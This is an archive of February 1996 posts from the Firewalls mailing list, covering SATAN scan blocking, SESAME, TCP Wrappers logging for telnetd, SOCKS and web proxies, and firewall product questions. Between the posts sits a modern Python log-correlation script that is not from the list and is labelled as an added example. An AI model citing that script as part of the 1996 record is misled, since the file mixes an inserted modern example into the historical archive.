> the above security problems are solved by MPF. The current version
> of MPF can detect port scans from SATAN and automatically block
> all packets from a host running SATAN.
[snip...]
>Maybe they assumed that their DHB (Dynamic Host Blocking) solved everything
>when it blocks out an entire host when it notices a SATAN style attack.
>

Don't forget the rather spectacular opportunities for denial-of-service attacks such host blocking would offer.
Ian From firewalls-owner Mon Feb 5 20:53:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA27713 for firewalls-outgoing; Mon, 5 Feb 1996 20:40:56 -0800 (PST) Received: from bifrost.paladin.com (router.paladin.com [199.3.129.207]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA27708 for ; Mon, 5 Feb 1996 20:40:49 -0800 (PST) Received: (from mail@localhost) by bifrost.paladin.com (8.6.12/8.6.9) id XAA08783; Mon, 5 Feb 1996 23:39:34 -0500 Received: from router.paladin.com(199.3.129.207) by bifrost.paladin.com via smap (V1.3) id sma008781; Mon Feb 5 23:39:29 1996 Date: Mon, 5 Feb 1996 23:39:29 -0500 (EST) From: Chris Woods To: KM cc: firewalls@GreatCircle.COM Subject: Re: Need a few pointers In-Reply-To: <9602052109.AA00719@hfsi> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 5 Feb 1996, KM wrote: > > There are other operating systems? :) When did Microsoft buy Wang Fed? ;-) Chris Woods Systems Administrator cjwoods@paladin.com Paladin Computing Solutions 617-273-4226 http://www.paladin.com/chris/ Want the government to control what you are allowed to read and see? "Why, NO!", you say? 
See http://www.eff.org/blueribbon.html

From firewalls-owner Tue Feb 6 01:16:17 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id AAA06377 for firewalls-outgoing; Tue, 6 Feb 1996 00:59:35 -0800 (PST)
Received: from alcatel.fr (mail.alcatel-alsthom.fr [193.104.30.131]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id AAA06352 for ; Tue, 6 Feb 1996 00:58:51 -0800 (PST)
Received: from alcatel.fr (gatekeeper-ssn.alcatel.fr [155.132.180.241]) by mailgate.alcatel.fr (8.7.3/8.7.3) with ESMTP id JAA18269 for ; Tue, 6 Feb 1996 09:58:16 +0100
Received: from AHQP14 (ahqp14.ahqps.alcatel.fr [155.132.120.211]) by nsfhh5.alcatel.fr (8.7.3/8.7.3) with SMTP id JAA25482 for ; Tue, 6 Feb 1996 09:59:07 +0100 (MET)
Message-Id: <199602060859.JAA25482@nsfhh5.alcatel.fr>
Comments: Authenticated sender is
From: "Kare Presttun"
Organization: Alcanet International
To: Firewalls@GreatCircle.COM
Date: Tue, 6 Feb 1996 10:01:56 +0100
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Subject: More SESAME
Reply-to: Kare.Presttun@ansf.alcatel.fr
X-mailer: Pegasus Mail for Windows (v2.01)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

I'm sorry for posting such a brief message on SESAME. A bit more explanation follows.

It is available from: http://www.esat.kuleuven.ac.be/cosic/sesame.html

You can regard it as a kind of enhanced Kerberos that supports a mix of public and secret key cryptography, delegation of rights, separation of the authentication method from the rest of the system, multiple security domains, and cross-domain security. It can directly replace Kerberos in DCE. It has an enhanced GSS-API to take advantage of the enhanced services. It is in the public domain (as of today), and Internet drafts are filed to progress it to an RFC. It is an ECMA standard. For more information and source code, check out the above URL.
I know this list is about firewalls, but I also know that many of you have wider security interests than just firewalls.

Regards,
Kare

----------------------------------------------------------
| Kare Presttun                   Alcanet International  |
| Tel: +33 1 4058 5614            33, rue Emeriau        |
| Fax: +33 1 4058 5945            F-75015 Paris          |
| Kare.Presttun@ansf.alcatel.fr   FRANCE                 |
----------------------------------------------------------

From firewalls-owner Tue Feb 6 04:38:35 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA12379 for firewalls-outgoing; Tue, 6 Feb 1996 04:27:25 -0800 (PST)
Received: from sarswati.mindware.soft.net (sarswati.mindware.soft.net [164.164.52.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA12374 for ; Tue, 6 Feb 1996 04:27:18 -0800 (PST)
Received: from gangotri.mindware.soft.net by sarswati.mindware.soft.net id aa03553; 6 Feb 96 17:54 IST
Received: by gangotri.mindware.soft.net with Microsoft Mail id <31180839@gangotri.mindware.soft.net>; Tue, 06 Feb 96 18:02:33 PST
From: Prakash N Purushotham
To: "'firewalls@greatcircle.com'"
Subject: telnetd
Date: Tue, 06 Feb 96 17:53:00 PST
Message-ID: <31180839@gangotri.mindware.soft.net>
X-Mailer: Microsoft Mail V3.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Is there any way I can configure telnetd to log the client's IP address, the login id used, and time stamps in syslog?
Prakash
prakashp@mindware.soft.net

From firewalls-owner Tue Feb 6 06:14:00 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA14000 for firewalls-outgoing; Tue, 6 Feb 1996 05:55:52 -0800 (PST)
Received: from gatekeeper.qms.com (gatekeeper.qms.com [161.33.3.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA13995 for ; Tue, 6 Feb 1996 05:55:48 -0800 (PST)
Received: from sun470.rd.qms.com (sun470.qms.com) by gatekeeper.qms.com (4.1/SMI-4.1) id AA01799; Tue, 6 Feb 96 07:54:59 CST
Received: from joker.rd.qms.com by sun470.rd.qms.com (4.1/SMI-4.1) id AA05945; Tue, 6 Feb 96 07:54:57 CST
From: smithj@rd.qms.com (John Smith)
Received: by joker.rd.qms.com (4.1) id AA01952; Tue, 6 Feb 96 07:54:56 CST
Date: Tue, 6 Feb 96 07:54:56 CST
Message-Id: <9602061354.AA01952@joker.rd.qms.com>
To: Firewalls@greatcircle.com
Subject: Socks and Internet News
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Is there a way to safely tunnel NNTP through SOCKS? Since I'm having to 'experiment' on our running firewall I want to make sure I get it right without opening 10k new holes.

Thanks for any advice.
John Smith
john_smith@rd.qms.com

From firewalls-owner Tue Feb 6 06:24:27 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA14054 for firewalls-outgoing; Tue, 6 Feb 1996 05:58:41 -0800 (PST)
Received: from smtp-gw01.ny.us.ibm.net ([165.87.194.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA14049 for ; Tue, 6 Feb 1996 05:58:37 -0800 (PST)
From: pcuser@slip133-171.dc.us.ibm.net
Received: (from uucp@localhost) by smtp-gw01.ny.us.ibm.net (8.6.9/8.6.9) id NAA41556 for <@smtp-gw01.ny.us.ibm.net:Firewalls@GreatCircle.COM>; Tue, 6 Feb 1996 13:57:47 GMT
Message-Id: <199602061357.NAA41556@smtp-gw01.ny.us.ibm.net>
Received: from slip133-177.dc.us.ibm.net(129.37.133.177) by smtp-gw01.ny.us.ibm.net via smap (V1.3mjr) id smaOzkDFW; Tue Feb 6 13:57:34 1996
Date: Tue, 6 Feb 96 10:04:23 PST
Subject: Firewalls Product Comparison
To: @smtp-gw01.ny.us.ibm.net:Firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi guys,

I need to prepare a comparative study between Sun's Firewall 1 and IBM NetSP, for the end of this week. Does anyone know where I could find some interesting articles concerning both of these products? Any help would be appreciated.
Wilmer Caripe
EMSCA - ENGINEERING AND MANUFACTURING SYSTEMS
CARACAS, VENEZUELA

From firewalls-owner Tue Feb 6 06:40:14 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA14807 for firewalls-outgoing; Tue, 6 Feb 1996 06:38:05 -0800 (PST)
Received: from protosoft.com ([204.128.207.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA14802 for ; Tue, 6 Feb 1996 06:38:01 -0800 (PST)
Received: by protosoft.com (4.1/SMI-4.1) id AA10053; Tue, 6 Feb 96 08:36:18 CST
Date: Tue, 6 Feb 1996 08:36:17 -0600 (CST)
From: Mohammed Ali
To: Prakash N Purushotham
Cc: "'firewalls@greatcircle.com'"
Subject: Re: telnetd
In-Reply-To: <31180839@gangotri.mindware.soft.net>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Tue, 6 Feb 1996, Prakash N Purushotham wrote:
>
> Is there any way I can configure telnetd to log the client's
> IP Address, the login id used, time stamps in syslog?
>

How about using TCP Wrappers !

Mohammed Ali.
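The replies to Prakash's question point at TCP Wrappers, whose tcpd writes a syslog line per accepted or refused connection carrying the client address and a timestamp, while the login id is logged separately by login(1). The following added example (not code from any of the list posts) correlates the two record types over constructed log lines so that client IP, login id and time appear together; the tcpd "connect from" wording is tcpd's own, and the login line format, the 1996 year and the 60-second pairing window are assumptions.

```python
"""Correlate TCP Wrappers (tcpd) connection records with login records.

Added example, not code from the mailing-list posts. tcpd logs one
"connect from <client>" (or "refused connect from <client>") syslog
line per connection; the login(1) line format used here and the year
are assumptions, and SAMPLE_LOG is constructed.
"""
import re
from datetime import datetime, timedelta

YEAR = 1996  # classic syslog lines carry no year (assumed value)

# tcpd record: "<ts> <host> in.telnetd[1021]: connect from 192.0.2.17"
TCPD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<service>in\.\w+)\[(?P<pid>\d+)\]: "
    r"(?P<refused>refused )?connect from (?P<client>\S+)$"
)
# assumed login(1) record:
# "<ts> <host> login[1021]: LOGIN ON ttyp2 BY prakash FROM 192.0.2.17"
LOGIN_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) login\[\d+\]: "
    r"LOGIN ON (?P<tty>\S+) BY (?P<user>\S+) FROM (?P<client>\S+)$"
)

# Constructed sample log (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
Feb  6 17:53:01 gangotri in.telnetd[1021]: connect from 192.0.2.17
Feb  6 17:53:04 gangotri login[1021]: LOGIN ON ttyp2 BY prakash FROM 192.0.2.17
Feb  6 17:55:30 gangotri in.telnetd[1044]: refused connect from 203.0.113.9
Feb  6 18:01:12 gangotri in.ftpd[1050]: connect from 192.0.2.17
Feb  6 18:03:40 gangotri in.telnetd[1062]: connect from 192.0.2.44
""".splitlines()


def parse_ts(text):
    """Turn 'Feb  6 17:53:01' into a datetime, using the assumed year."""
    return datetime.strptime(f"{YEAR} {text}", "%Y %b %d %H:%M:%S")


def correlate(lines, window=timedelta(seconds=60)):
    """Return one record per tcpd connection, in log order.

    An accepted telnet connection is paired with the first unused login
    from the same client address within `window`; refused connections,
    non-telnet services and connections with no matching login keep
    user=None.
    """
    connects, logins = [], []
    for line in lines:
        m = TCPD_RE.match(line)
        if m:
            connects.append({
                "ts": parse_ts(m["ts"]), "service": m["service"],
                "client": m["client"], "refused": bool(m["refused"]),
                "user": None,
            })
            continue
        m = LOGIN_RE.match(line)
        if m:
            logins.append({"ts": parse_ts(m["ts"]), "user": m["user"],
                           "client": m["client"], "used": False})

    for rec in connects:
        if rec["refused"] or rec["service"] != "in.telnetd":
            continue
        for login in logins:
            if (not login["used"] and login["client"] == rec["client"]
                    and rec["ts"] <= login["ts"] <= rec["ts"] + window):
                rec["user"] = login["user"]
                login["used"] = True
                break
    return connects


def refused_clients(records):
    """Client addresses that tcpd turned away (hosts.deny hits)."""
    return sorted({r["client"] for r in records if r["refused"]})


def unattributed_telnet(records):
    """Accepted telnet connections with no login id inside the window,
    i.e. the ones worth a second look (failed passwords, probes)."""
    return [r for r in records
            if r["service"] == "in.telnetd" and not r["refused"]
            and r["user"] is None]


if __name__ == "__main__":
    for r in correlate(SAMPLE_LOG):
        state = "refused" if r["refused"] else (r["user"] or "-")
        print(f'{r["ts"]:%b %d %H:%M:%S} {r["service"]:<11} '
              f'{r["client"]:<15} {state}')
```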
From firewalls-owner Tue Feb 6 06:58:08 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA15224 for firewalls-outgoing; Tue, 6 Feb 1996 06:45:46 -0800 (PST)
Received: from iss.net (iss.iss.net [204.241.60.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA15218 for ; Tue, 6 Feb 1996 06:45:42 -0800 (PST)
Received: (from cklaus@localhost) by iss.net (8.6.4/8.6.4) id KAA25413 for firewalls@greatcircle.com; Tue, 6 Feb 1996 10:07:39 -0500
From: Christopher Klaus
Message-Id: <199602061507.KAA25413@iss.net>
Subject: PC Week Article on Network Security Scanners
To: firewalls@greatcircle.com
Date: Tue, 6 Feb 1996 10:07:38 +1494730 (EST)
X-Mailer: ELM [version 2.4 PL20]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Daemons Defy Hackers
--------------------

PC Week (Feb 5) has an article comparing all the network security scanners: Internet Scanner 3.2, PingWare 2.01, SATAN, and NetProbe. It does a really good job pointing out the strengths and weaknesses of these products. The online article is at:

http://www.zdnet.com/~pcweek/netweek/0205/tdaem.html
or
http://www.zdnet.com/~pcweek/netweek/netweek.html

ISS 1.x and Internet Scanner 3.2 Comparison
-------------------------------------------

With CERT recommending and many people using the shareware version of Internet Security Scanner 1.x (ISS), we have put up a whitepaper comparing the commercial and shareware versions. The whitepaper is available at:

ftp://ftp.iss.net/pub/iss/issvis.doc

ISS Receives Funding
--------------------

Internet Security Systems, Inc. has received venture funding from Greylock Management Company and Sigma Partners. Both of these firms have funded early stage Internet technology companies and bring tremendous value to ISS at this stage of our growth.
This funding provides ISS with the necessary capital to deliver innovative new security products to the Internet marketplace. We have many available engineering positions in our labs for the development of our new products. If you have extensive experience in UNIX and NT system level programming, please contact us at jobs@iss.net

--
Christopher William Klaus                    Voice: (404)252-7270. Fax: (404)252-2427
Internet Security Systems, Inc.              "Internet Scanner finds
Ste. 115, 5871 Glenridge Dr, Atlanta, GA 30328   your network security holes
Web: http://iss.net/ Email: cklaus@iss.net     before the hackers do."

From firewalls-owner Tue Feb 6 07:24:07 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA15044 for firewalls-outgoing; Tue, 6 Feb 1996 06:41:43 -0800 (PST)
Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id GAA15023 for ; Tue, 6 Feb 1996 06:41:29 -0800 (PST)
Received: from kuma.ciens.ucv.ve by relay2.UU.NET with SMTP id QQabti14509; Tue, 6 Feb 1996 09:37:46 -0500 (EST)
Received: by kuma.ciens.ucv.ve (1.37.109.4/16.2) id AA06450; Tue, 6 Feb 96 09:37:24 -0430
Date: Tue, 6 Feb 1996 09:37:24 -0430 (SAT)
From: Carolina Elortegui
To: Firewalls Mailing List
Subject: Some Information
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

I just want someone to tell me where I can find information about what every service you can allow or deny in inetd.sec means. I tried the "man" command, but it doesn't help. I tried the manual, but it doesn't help either. Please, would you send me some addresses where I can find information.

Thanks.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Carolina Elortegui                 Laboratorio de Postgrado
Universidad Central de Venezuela   Administrador
Facultad de Ciencias               Escuela de Computacion
E-mail: celort@kuma.ciens.ucv.ve
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From firewalls-owner Tue Feb 6 07:58:48 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA18823 for firewalls-outgoing; Tue, 6 Feb 1996 07:43:00 -0800 (PST)
Received: from Fe3.rust.net (Fe3.rust.net [204.157.12.254]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA18816 for ; Tue, 6 Feb 1996 07:42:54 -0800 (PST)
Received: from dtw-2.rust.net (dtw-2.rust.net [205.199.83.102]) by Fe3.rust.net (8.7.3/8.7.3) with SMTP id KAA18136; Tue, 6 Feb 1996 10:40:05 -0500 (EDT)
Date: Tue, 6 Feb 1996 10:40:05 -0500 (EDT)
Message-Id: <199602061540.KAA18136@Fe3.rust.net>
X-Sender: janken@rust.net
X-Mailer: Windows Eudora Pro Version 2.1.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: "KM"
From: "Kenneth J. Stephens"
Subject: Re: Survey
Cc: firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 03:58 PM 2/5/96 -0500, you wrote:
SNIP OTHER STUFF-------------
>INFOSECURITY NEWS ran its "Shopping for Firewalls" survey in 1995.
>Unfortunately, my copy is a reprint, which has no specific issue date on it.
>(Magazines that print and distribute these reprints should take heed; it would
>be extremely helpful if you'd include the date of the issue in which they were
>printed!) If anyone can help, please do.

If the magazine publishers forced the issue date onto all of their reprints the vendors would have little use for the reprints. The date stamp would obsolete the reprint so quickly that the vendor would look foolish for distributing old info. One of the hazards of a dynamic industry.
Ken

>
>Karen Goertzel
>Manager, International Programmes and Special Projects
>Secure Systems and Services Operation
>Wang Federal, Inc.
>7900 Westpark Drive - MS 700
>McLean, Virginia 22102-4299
>TEL: 703-827 3914
>FAX: 703-827 3161
>goertzek@wangfed.com
>http://www.wangfed.com
>

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
[]                                                                         []
[] Ken Stephens          Senior Capacity Planner/Data Security Officer     []
[] email: Ken_Stephens@miconsulting.com          Voice (313) 876-5081      []
[] Michigan Employment Security Commission (MESC)  Fax (313) 876-6827      []
[] 7th Fl. I.S.                                                            []
[] 7310 Woodward Ave                                                       []
[] Detroit, MI 48202                                                       []
[]                                                                         []
[] Millennium Consulting          Your Security Policy is only             []
[] 28234 Diesing Dr.              as strong as your organization's         []
[] Madison Heights, MI 48071      commitment to it.                        []
[]                                                                         []
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

From firewalls-owner Tue Feb 6 08:08:33 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19284 for firewalls-outgoing; Tue, 6 Feb 1996 07:53:02 -0800 (PST)
Received: from mail.pi.se (mail.pi.se [194.52.20.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19268 for ; Tue, 6 Feb 1996 07:52:56 -0800 (PST)
Received: from z (docutech.telegate.se [194.142.26.28]) by mail.pi.se (8.6.10/8.6.9) with SMTP id QAA17949; Tue, 6 Feb 1996 16:50:56 +0100
Message-Id: <199602061550.QAA17949@mail.pi.se>
X-Sender: s2833@mail.pi.se
X-Mailer: Windows Eudora Light Version 1.5.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Tue, 06 Feb 1996 16:49:18 -10000
To: Sick Puppy , firewalls@GreatCircle.COM
From: Matts Kallioniemi
Subject: Re: Need a few pointers
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 17.41 1996-02-05 -0500, Sick Puppy wrote:
>There was a very good response to my query. I had no idea there were
>so many security problems and performance problems associated with
>WindBlows 95.
>Sounds like the operating system was written by a couple
>of drunken cats. In a couple of days I will get the responses together
>in one file, together with a couple of good web pointers, and pass it on
>to anyone who wants an e-mailed copy.

I want one, please! Why don't you post it to the list?

matts

From firewalls-owner Tue Feb 6 08:23:47 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19221 for firewalls-outgoing; Tue, 6 Feb 1996 07:49:53 -0800 (PST)
Received: from sonyinet.sony.co.jp (sonyinet.sony.co.jp [202.238.80.17]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19211 for ; Tue, 6 Feb 1996 07:49:47 -0800 (PST)
Received: from sonygw.sony.co.jp ([43.0.1.249]) by sonyinet.sony.co.jp (8.6.10/3.3Wb-96011708) with SMTP id AAA09561 for ; Wed, 7 Feb 1996 00:48:56 +0900
Received: from sabakon.adv.sbc.sony.co.jp ([43.194.41.150]) by sonygw.sony.co.jp (4.0/6.4J.6) id AA06508; Wed, 7 Feb 96 00:48:36 JST
Received: from barolo.adv.sbc.sony.co.jp by sabakon.adv.sbc.sony.co.jp (4.1/6.4J.6-sbc) id AA05482; Tue, 6 Feb 96 15:48:35 GMT
From: md@adv.sbc.sony.co.jp (Mark Dudley)
Date: Tue, 6 Feb 96 15:46:38 GMT
Received: from rioja.adv.sbc.sony.co.jp by barolo.adv.sbc.sony.co.jp (4.0/6.4J.6-sbc) id AA17730; Tue, 6 Feb 96 15:46:38 GMT
Message-Id: <9602061546.AA17730@barolo.adv.sbc.sony.co.jp>
To: firewalls@greatcircle.com
Subject: planet gateway firewall
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I want to set up a connection to the Internet via an ISDN line and use a firewall. Planet Gateway offer a package to do this including their own firewall. Has anyone had any experience of their firewall product? If so, any comments?
Mark Dudley

From firewalls-owner Tue Feb 6 08:38:58 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA20924 for firewalls-outgoing; Tue, 6 Feb 1996 08:32:11 -0800 (PST)
Received: from bayflash.stpt.usf.edu (bayflash.stpt.usf.edu [131.247.140.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA20912 for ; Tue, 6 Feb 1996 08:32:02 -0800 (PST)
Received: (johnson@localhost) by bayflash.stpt.usf.edu (8.6.11/8.6.5) id LAA13256; Tue, 6 Feb 1996 11:27:42 -0500
Date: Tue, 6 Feb 1996 11:27:41 -0500 (EST)
From: Steven Johnson - Hukd on Fonix
X-Sender: johnson@bayflash
To: Prakash N Purushotham
cc: "'firewalls@greatcircle.com'"
Subject: Re: telnetd
In-Reply-To: <31180839@gangotri.mindware.soft.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Tue, 6 Feb 1996, Prakash N Purushotham wrote:
> Is there any way I can configure telnetd to log the client's
> IP Address, the login id used, time stamps in syslog?

Use TCP Wrappers; you can configure which protocols you want added to an event log. We currently monitor telnet, finger, ftp, and rsh, to name a few.
Email: johnson@stpt.usf.edu
WWW: http://www.stpt.usf.edu/~johnson

From firewalls-owner Tue Feb 6 09:03:43 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19588 for firewalls-outgoing; Tue, 6 Feb 1996 07:59:51 -0800 (PST)
Received: from indigo.atlanta.com (indigo.atlanta.net [155.229.2.201]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19581 for ; Tue, 6 Feb 1996 07:59:44 -0800 (PST)
Received: by atlanta.net (MX V4.2 VAX) with SITE; Tue, 06 Feb 1996 10:59:09 EST
Received: from relay3.UU.NET by indigo.atlanta.com (MX V4.2 VAX) with SMTP; Mon, 29 Jan 1996 13:51:09 EST
Received: from miles.greatcircle.com by relay3.UU.NET with ESMTP id QQaaql23355; Mon, 29 Jan 1996 13:47:31 -0500 (EST)
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA07596 for firewalls-outgoing; Mon, 29 Jan 1996 09:53:17 -0800 (PST)
Received: from bwh.harvard.edu (bwh.harvard.edu [134.174.81.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA07591 for ; Mon, 29 Jan 1996 09:53:13 -0800 (PST)
Received: from waller.bwh.harvard.edu (waller.bwh.harvard.edu [134.174.81.249]) by bwh.harvard.edu (8.6.9/8.6.9) with ESMTP id MAA09560; Mon, 29 Jan 1996 12:52:09 -0500
From: Adam Shostack
Received: by waller.bwh.harvard.edu (8.6.9) id MAA02600; Mon, 29 Jan 1996 12:51:49 -0500
Message-ID: <199601291751.MAA02600@waller.bwh.harvard.edu>
Subject: Re: router performance
To: bwalker@musings.com (Brad Walker)
Date: Mon, 29 Jan 1996 12:51:49 -0500 (EST)
CC: firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

You wrote:
| I believe at one time there was some work being done at Harvard Univ.
| about testing router performance.
|
| Can someone please point me to this or another site that is doing
| router performance testing..

Harvard has a network device test lab, ftp or http ndtl.harvard.edu/ndtl

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From firewalls-owner Tue Feb 6 09:53:32 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA23487 for firewalls-outgoing; Tue, 6 Feb 1996 09:41:30 -0800 (PST)
Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA23470; Tue, 6 Feb 1996 09:41:17 -0800 (PST)
Message-Id: <199602061741.JAA23470@miles.greatcircle.com>
Received: by habanero.jmu.edu (1.37.109.16/16.2) id AA042058427; Tue, 6 Feb 1996 12:40:27 -0500
Date: Tue, 6 Feb 1996 12:40:27 -0500
From: gary flynn
To: firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM
Subject: Re: SQL*Net proxy?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Has anyone successfully configured a proxy for outbound/inbound SQL*Net
> transactions?
>
> In my observations, Unix to Unix server communications take place on a
> designated port, but PC to Unix communications switch port numbers after
> about 20-25 packets.
>
> The PC always sends to the designated port, but the Unix server changes
> to a different port. This makes filtering difficult.
>

Oracle servers that are configured as multithreaded will use dynamic ports. Several firewall vendors are working with Oracle to develop a SQLnet proxy. I don't know the timeframe.
From firewalls-owner Tue Feb 6 10:12:54 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA24566 for firewalls-outgoing; Tue, 6 Feb 1996 10:04:23 -0800 (PST)
Received: from pcslink.com (pcslink.com [206.43.160.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA24560 for ; Tue, 6 Feb 1996 10:04:19 -0800 (PST)
Received: from ryan (ryan.pcslink.com [206.43.161.41]) by pcslink.com (8.6.12/8.6.12) with SMTP id LAA15513 for ; Tue, 6 Feb 1996 11:03:27 -0700
Message-ID: <31179737.5344@pcslink.com>
Date: Tue, 06 Feb 1996 11:00:23 -0700
From: Ryan Mooney
X-Mailer: Mozilla 2.0b6a (WinNT; I)
MIME-Version: 1.0
To: firewalls@GreatCircle.COM
Subject: Re: WWW Proxy
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> > to add one more, for the firewalls 'inside' address> Does such a proxy
> > exist for WWW so that:
> > 1. Users can use which-ever browsers they like.
> > 2. The 'standard' winsock.dll, such as provided by FTP with their
> > Onnet product, can still be used.
>
> CERN's httpd
> and run it in caching-proxy mode. I set it up to listen to a port, and
> simply point all http, ftp, and gopher requests at that port. Note that
>
> > If so, which commercial firewalls support this?
>
> I have this in place with TIS' fwtk. I simply don't use the http-gw that
> came with the fwtk, and use CERN's instead.

I used CERN for a company I worked for quite a while ago but have heard that Harvest Cache is a LOT faster (and the CERN daemon is quite slow). I socksified the CERN daemon (I imagine it could fairly easily be done for the Harvest daemon also) so that I wouldn't have this huge process running on my firewall (which is generally IMNSHO a bad idea - this is the same reason we don't run sendmail on firewall machines without a wrapper).
Simple Diagram (I love diagrams)

client----Socksified Cern/Harvest-----Application layer firewall(socks)----world

Just my $0.000002

From firewalls-owner Tue Feb 6 10:24:00 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA24896 for firewalls-outgoing; Tue, 6 Feb 1996 10:13:23 -0800 (PST)
Received: from newsgw.mentorg.com (newsgw.mentorg.com [137.202.128.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA24864 for ; Tue, 6 Feb 1996 10:13:06 -0800 (PST)
Received: from emperor.sje.MENTORG.COM by newsgw.mentorg.com (8.6.4/CF5.22R) id KAA02869; Tue, 6 Feb 1996 10:10:31 -0800
Received: from sjsys5 by emperor.sje.MENTORG.COM (8.6.8.1/CF5.24R) id KAA12762; Tue, 6 Feb 1996 10:10:40 -0800
From: joe_woolf@MENTORG.COM (Joe Woolf)
Received: by sjsys5 (4.1/CF5.24L) id AA21330; Tue, 6 Feb 96 10:13:29 PST
Date: Tue, 6 Feb 96 10:13:29 PST
Message-Id: <9602061813.AA21330@sjsys5>
To: prakashp@mindware.soft.net, ali@protosoft.com
Subject: Re: telnetd
Cc: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Mohammed,

Yes. That seems to be the easiest solution.

Joe Woolf
Network Support
Mentor Graphics, San Jose
Phone: 451-5844

** From firewalls-owner@GreatCircle.COM Tue Feb 6 08:05:47 1996
** Date: Tue, 6 Feb 1996 08:36:17 -0600 (CST)
** From: Mohammed Ali
** To: Prakash N Purushotham
** Cc: "'firewalls@greatcircle.com'"
** Subject: Re: telnetd
** Mime-Version: 1.0
** Content-Type: TEXT/PLAIN; charset=US-ASCII
** Sender: firewalls-owner@GreatCircle.COM
** Precedence: bulk
**
